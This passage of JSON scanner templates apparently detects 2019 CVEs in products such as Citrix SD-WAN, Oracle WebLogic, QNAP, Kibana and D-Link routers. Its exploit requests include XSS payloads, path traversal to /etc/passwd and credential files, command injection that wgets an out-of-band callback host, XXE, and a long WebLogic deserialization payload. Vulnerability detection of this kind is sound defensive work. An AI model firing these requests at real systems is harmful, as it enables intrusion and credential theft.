Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/index.php"],"headers":{"Accept-Language":";alert(document.domain)//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var detectedLanguage = ';alert(document.domain)//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17662","info":{"name":"ThinVNC 1.0b1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["User=","Password="],"condition":"and"},{"type":"word","part":"header","words":["application/binary"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8903","info":{"name":"Totaljs <3.2.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache2.conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17506","info":{"name":"D-Link DIR-868L/817LW - Information Disclosure","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</password>","DEVICE.ACCOUNT"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9733","info":{"name":"JFrog Artifactory 6.7.3 - Admin Login Bypass","severity":"critical"},"requests":[{"raw":["POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nX-Requested-With: artUI\nX-Forwarded-For: 127.0.0.1\nRequest-Agent: artifactoryUI\nContent-Type: application/json\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/artifactory/webapp/\n\n{\"user\":\"access-admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\": \"access-admin\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12987","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://{{interactsh-url}}%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-14974","info":{"name":"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["url = window.location.search.split(\"?desktop_url=\")[1]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14251","info":{"name":"T24 Web Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd","{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7609","info":{"name":"Kibana Timelion - Arbitrary Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/timelion/run"],"body":"{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}","headers":{"Content-Type":"application/json; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["seriesList"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1821","info":{"name":"Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /servlet/UploadServlet HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nPrimary-IP: 127.0.0.1\nFilename: test.tar\nFilesize: 10240\nCompressed-Archive: false\nDestination-Dir: tftpRoot\nFilecount: 1\nContent-Length: 269\nContent-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83\n\n--871a4a346a547cf05cb83f57b9ebcb83\nContent-Disposition: form-data; name=\"files\"; filename=\"test.tar\"\n\n../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar  00000000000000{{randstr}}\n--871a4a346a547cf05cb83f57b9ebcb83--\n","GET /test.txt HTTP/1.1\nHost: {{Host}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains((body_2), '{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2019-12990","info":{"name":"Citrix SD-WAN Center - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfilename=../../../../../../home/talariuser/www/app/webroot/files/{{randstr}}&filedata=\n","GET /talari/app/files/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code_3 == 200","contains(body_1, \"<title>Citrix SD-WAN</title>\")"],"condition":"and"}]}]},{"id":"CVE-2019-11248","info":{"name":"Debug Endpoint pprof - Exposure Detection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/debug/pprof/","{{BaseURL}}/debug/pprof/goroutine?debug=1"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["Types of profiles available:","Profile Descriptions","goroutine profile: total"],"condition":"or"}]}]},{"id":"CVE-2019-16313","info":{"name":"ifw8 Router ROM v4.31 - Credential Discovery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/action/usermanager.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"],"part":"body"}]}]},{"id":"CVE-2019-7192","info":{"name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /photo/p/api/album.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\na=setSlideshow&f=qsamplealbum\n","GET /photo/slideshow.php?album={{album_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /photo/p/api/video.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nalbum={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["admin:.*:0:0:"]},{"type":"word","part":"header_3","words":["video/subtitle"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"album_id","part":"body_1","group":1,"regex":["<output>([a-zA-Z]+)<\\/output>"],"internal":true},{"type":"regex","name":"access_code","part":"body_2","group":1,"regex":["encodeURIComponent\\('([A-Za-z0-9]+)'\\)"],"internal":true}]}]},{"id":"CVE-2019-8446","info":{"name":"Jira Improper Authorization","severity":"medium"},"requests":[{"raw":["POST /rest/issueNav/1/issueTable HTTP/1.1\nHost: {{Hostname}}\nConnection: Close\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\nX-Atlassian-Token: no-check\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n{'jql':'project in projectsLeadByUser(\"{{randstr}}\")'}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["the user does not exist"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2616","info":{"name":"Oracle Business Intelligence/XML Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /xmlpserver/ReportTemplateService.xls HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nContent-Type: text/xml; charset=UTF-8\n\n<!DOCTYPE soap:envelope PUBLIC \"-//B/A/EN\" \"http://{{interactsh-url}}\">\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-7543","info":{"name":"KindEditor 4.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/kindeditor/php/demo.php","{{BaseURL}}/php/demo.php"],"body":"content1=</script><script>alert(document.domain)</script>&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-2725","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\ncmd: id\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"5010\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>9</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>90</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>21</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>117</byte></void><void index=\"201\"><byte>115</byte></void><void index=\"202\"><byte>101</byte></void><void index=\"203\"><byte>83</byte></void><void index=\"204\"><byte>101</byte></void><void index=\"205\"><byte>114</byte></void><void index=\"206\"><byte>118</byte></void><void index=\"207\"><byte>105</byte></void><void index=\"208\"><byte>99</byte></void><void index=\"209\"><byte>101</byte></void><void index=\"210\"><byte>115</byte></void><void index=\"211\"><byte>77</byte></void><void index=\"212\"><byte>101</byte></void><void index=\"213\"><byte>99</byte></void><void index=\"214\"><byte>104</byte></void><void index=\"215\"><byte>97</byte></void><void index=\"216\"><byte>110</byte></void><void index=\"217\"><byte>105</byte></void><void index=\"218\"><byte>115</byte></void><void index=\"219\"><byte>109</byte></void><void index=\"220\"><byte>76</byte></void><void index=\"221\"><byte>0</byte></void><void index=\"222\"><byte>25</byte></void><void index=\"223\"><byte>95</byte></void><void index=\"224\"><byte>97</byte></void><void index=\"225\"><byte>99</byte></void><void index=\"226\"><byte>99</byte></void><void index=\"227\"><byte>101</byte></void><void index=\"228\"><byte>115</byte></void><void index=\"229\"><byte>115</byte></void><void index=\"230\"><byte>69</byte></void><void index=\"231\"><byte>120</byte></void><void index=\"232\"><byte>116</byte></void><void index=\"233\"><byte>101</byte></void><void index=\"234\"><byte>114</byte></void><void index=\"235\"><byte>110</byte></void><void index=\"236\"><byte>97</byte></void><void index=\"237\"><byte>108</byte></void><void index=\"238\"><byte>83</byte></void><void index=\"239\"><byte>116</byte></void><void index=\"240\"><byte>121</byte></void><void index=\"241\"><byte>108</byte></void><void index=\"242\"><byte>101</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>104</byte></void><void index=\"245\"><byte>101</byte></void><void index=\"246\"><byte>101</byte></void><void index=\"247\"><byte>116</byte></void><void index=\"248\"><byte>116</byte></void><void index=\"249\"><byte>0</byte></void><void index=\"250\"><byte>18</byte></void><void index=\"251\"><byte>76</byte></void><void index=\"252\"><byte>106</byte></void><void index=\"253\"><byte>97</byte></void><void index=\"254\"><byte>118</byte></void><void index=\"255\"><byte>97</byte></void><void index=\"256\"><byte>47</byte></void><void index=\"257\"><byte>108</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>110</byte></void><void index=\"260\"><byte>103</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>83</byte></void><void index=\"263\"><byte>116</byte></void><void index=\"264\"><byte>114</byte></void><void index=\"265\"><byte>105</byte></void><void index=\"266\"><byte>110</byte></void><void index=\"267\"><byte>103</byte></void><void index=\"268\"><byte>59</byte></void><void index=\"269\"><byte>76</byte></void><void index=\"270\"><byte>0</byte></void><void index=\"271\"><byte>11</byte></void><void index=\"272\"><byte>95</byte></void><void index=\"273\"><byte>97</byte></void><void index=\"274\"><byte>117</byte></void><void index=\"275\"><byte>120</byte></void><void index=\"276\"><byte>67</byte></void><void index=\"277\"><byte>108</byte></void><void index=\"278\"><byte>97</byte></void><void index=\"279\"><byte>115</byte></void><void index=\"280\"><byte>115</byte></void><void index=\"281\"><byte>101</byte></void><void index=\"282\"><byte>115</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>0</byte></void><void index=\"285\"><byte>59</byte></void><void index=\"286\"><byte>76</byte></void><void index=\"287\"><byte>99</byte></void><void index=\"288\"><byte>111</byte></void><void index=\"289\"><byte>109</byte></void><void index=\"290\"><byte>47</byte></void><void index=\"291\"><byte>115</byte></void><void index=\"292\"><byte>117</byte></void><void index=\"293\"><byte>110</byte></void><void index=\"294\"><byte>47</byte></void><void index=\"295\"><byte>111</byte></void><void index=\"296\"><byte>114</byte></void><void index=\"297\"><byte>103</byte></void><void index=\"298\"><byte>47</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>112</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>99</byte></void><void index=\"303\"><byte>104</byte></void><void index=\"304\"><byte>101</byte></void><void index=\"305\"><byte>47</byte></void><void index=\"306\"><byte>120</byte></void><void index=\"307\"><byte>97</byte></void><void index=\"308\"><byte>108</byte></void><void index=\"309\"><byte>97</byte></void><void index=\"310\"><byte>110</byte></void><void index=\"311\"><byte>47</byte></void><void index=\"312\"><byte>105</byte></void><void index=\"313\"><byte>110</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>101</byte></void><void index=\"316\"><byte>114</byte></void><void index=\"317\"><byte>110</byte></void><void index=\"318\"><byte>97</byte></void><void index=\"319\"><byte>108</byte></void><void index=\"320\"><byte>47</byte></void><void index=\"321\"><byte>120</byte></void><void index=\"322\"><byte>115</byte></void><void index=\"323\"><byte>108</byte></void><void index=\"324\"><byte>116</byte></void><void index=\"325\"><byte>99</byte></void><void index=\"326\"><byte>47</byte></void><void index=\"327\"><byte>114</byte></void><void index=\"328\"><byte>117</byte></void><void index=\"329\"><byte>110</byte></void><void index=\"330\"><byte>116</byte></void><void index=\"331\"><byte>105</byte></void><void index=\"332\"><byte>109</byte></void><void index=\"333\"><byte>101</byte></void><void index=\"334\"><byte>47</byte></void><void index=\"335\"><byte>72</byte></void><void index=\"336\"><byte>97</byte></void><void index=\"337\"><byte>115</byte></void><void index=\"338\"><byte>104</byte></void><void index=\"339\"><byte>116</byte></void><void index=\"340\"><byte>97</byte></void><void index=\"341\"><byte>98</byte></void><void index=\"342\"><byte>108</byte></void><void index=\"343\"><byte>101</byte></void><void index=\"344\"><byte>59</byte></void><void index=\"345\"><byte>91</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>10</byte></void><void index=\"348\"><byte>95</byte></void><void index=\"349\"><byte>98</byte></void><void index=\"350\"><byte>121</byte></void><void index=\"351\"><byte>116</byte></void><void index=\"352\"><byte>101</byte></void><void index=\"353\"><byte>99</byte></void><void index=\"354\"><byte>111</byte></void><void index=\"355\"><byte>100</byte></void><void index=\"356\"><byte>101</byte></void><void index=\"357\"><byte>115</byte></void><void index=\"358\"><byte>116</byte></void><void index=\"359\"><byte>0</byte></void><void index=\"360\"><byte>3</byte></void><void index=\"361\"><byte>91</byte></void><void index=\"362\"><byte>91</byte></void><void index=\"363\"><byte>66</byte></void><void index=\"364\"><byte>91</byte></void><void index=\"365\"><byte>0</byte></void><void index=\"366\"><byte>6</byte></void><void index=\"367\"><byte>95</byte></void><void index=\"368\"><byte>99</byte></void><void index=\"369\"><byte>108</byte></void><void index=\"370\"><byte>97</byte></void><void index=\"371\"><byte>115</byte></void><void index=\"372\"><byte>115</byte></void><void index=\"373\"><byte>116</byte></void><void index=\"374\"><byte>0</byte></void><void index=\"375\"><byte>18</byte></void><void index=\"376\"><byte>91</byte></void><void index=\"377\"><byte>76</byte></void><void index=\"378\"><byte>106</byte></void><void index=\"379\"><byte>97</byte></void><void index=\"380\"><byte>118</byte></void><void index=\"381\"><byte>97</byte></void><void index=\"382\"><byte>47</byte></void><void index=\"383\"><byte>108</byte></void><void index=\"384\"><byte>97</byte></void><void index=\"385\"><byte>110</byte></void><void index=\"386\"><byte>103</byte></void><void index=\"387\"><byte>47</byte></void><void index=\"388\"><byte>67</byte></void><void index=\"389\"><byte>108</byte></void><void index=\"390\"><byte>97</byte></void><void index=\"391\"><byte>115</byte></void><void index=\"392\"><byte>115</byte></void><void index=\"393\"><byte>59</byte></void><void index=\"394\"><byte>76</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>5</byte></void><void index=\"397\"><byte>95</byte></void><void index=\"398\"><byte>110</byte></void><void index=\"399\"><byte>97</byte></void><void index=\"400\"><byte>109</byte></void><void index=\"401\"><byte>101</byte></void><void index=\"402\"><byte>113</byte></void><void index=\"403\"><byte>0</byte></void><void index=\"404\"><byte>126</byte></void><void index=\"405\"><byte>0</byte></void><void index=\"406\"><byte>4</byte></void><void index=\"407\"><byte>76</byte></void><void index=\"408\"><byte>0</byte></void><void index=\"409\"><byte>17</byte></void><void index=\"410\"><byte>95</byte></void><void index=\"411\"><byte>111</byte></void><void index=\"412\"><byte>117</byte></void><void index=\"413\"><byte>116</byte></void><void index=\"414\"><byte>112</byte></void><void index=\"415\"><byte>117</byte></void><void index=\"416\"><byte>116</byte></void><void index=\"417\"><byte>80</byte></void><void index=\"418\"><byte>114</byte></void><void index=\"419\"><byte>111</byte></void><void index=\"420\"><byte>112</byte></void><void index=\"421\"><byte>101</byte></void><void index=\"422\"><byte>114</byte></void><void index=\"423\"><byte>116</byte></void><void index=\"424\"><byte>105</byte></void><void index=\"425\"><byte>101</byte></void><void index=\"426\"><byte>115</byte></void><void index=\"427\"><byte>116</byte></void><void index=\"428\"><byte>0</byte></void><void index=\"429\"><byte>22</byte></void><void index=\"430\"><byte>76</byte></void><void index=\"431\"><byte>106</byte></void><void index=\"432\"><byte>97</byte></void><void index=\"433\"><byte>118</byte></void><void index=\"434\"><byte>97</byte></void><void index=\"435\"><byte>47</byte></void><void index=\"436\"><byte>117</byte></void><void index=\"437\"><byte>116</byte></void><void index=\"438\"><byte>105</byte></void><void index=\"439\"><byte>108</byte></void><void index=\"440\"><byte>47</byte></void><void index=\"441\"><byte>80</byte></void><void index=\"442\"><byte>114</byte></void><void index=\"443\"><byte>111</byte></void><void index=\"444\"><byte>112</byte></void><void index=\"445\"><byte>101</byte></void><void index=\"446\"><byte>114</byte></void><void index=\"447\"><byte>116</byte></void><void index=\"448\"><byte>105</byte></void><void index=\"449\"><byte>101</byte></void><void index=\"450\"><byte>115</byte></void><void index=\"451\"><byte>59</byte></void><void index=\"452\"><byte>120</byte></void><void index=\"453\"><byte>112</byte></void><void index=\"454\"><byte>0</byte></void><void index=\"455\"><byte>0</byte></void><void index=\"456\"><byte>0</byte></void><void index=\"457\"><byte>0</byte></void><void index=\"458\"><byte>-1</byte></void><void index=\"459\"><byte>-1</byte></void><void index=\"460\"><byte>-1</byte></void><void index=\"461\"><byte>-1</byte></void><void index=\"462\"><byte>0</byte></void><void index=\"463\"><byte>116</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>3</byte></void><void index=\"466\"><byte>97</byte></void><void index=\"467\"><byte>108</byte></void><void index=\"468\"><byte>108</byte></void><void index=\"469\"><byte>112</byte></void><void index=\"470\"><byte>117</byte></void><void index=\"471\"><byte>114</byte></void><void index=\"472\"><byte>0</byte></void><void index=\"473\"><byte>3</byte></void><void index=\"474\"><byte>91</byte></void><void index=\"475\"><byte>91</byte></void><void index=\"476\"><byte>66</byte></void><void index=\"477\"><byte>75</byte></void><void index=\"478\"><byte>-3</byte></void><void index=\"479\"><byte>25</byte></void><void index=\"480\"><byte>21</byte></void><void index=\"481\"><byte>103</byte></void><void index=\"482\"><byte>103</byte></void><void index=\"483\"><byte>-37</byte></void><void index=\"484\"><byte>55</byte></void><void index=\"485\"><byte>2</byte></void><void index=\"486\"><byte>0</byte></void><void index=\"487\"><byte>0</byte></void><void index=\"488\"><byte>120</byte></void><void index=\"489\"><byte>112</byte></void><void index=\"490\"><byte>0</byte></void><void index=\"491\"><byte>0</byte></void><void index=\"492\"><byte>0</byte></void><void index=\"493\"><byte>2</byte></void><void index=\"494\"><byte>117</byte></void><void index=\"495\"><byte>114</byte></void><void index=\"496\"><byte>0</byte></void><void index=\"497\"><byte>2</byte></void><void index=\"498\"><byte>91</byte></void><void index=\"499\"><byte>66</byte></void><void index=\"500\"><byte>-84</byte></void><void index=\"501\"><byte>-13</byte></void><void index=\"502\"><byte>23</byte></void><void index=\"503\"><byte>-8</byte></void><void index=\"504\"><byte>6</byte></void><void index=\"505\"><byte>8</byte></void><void 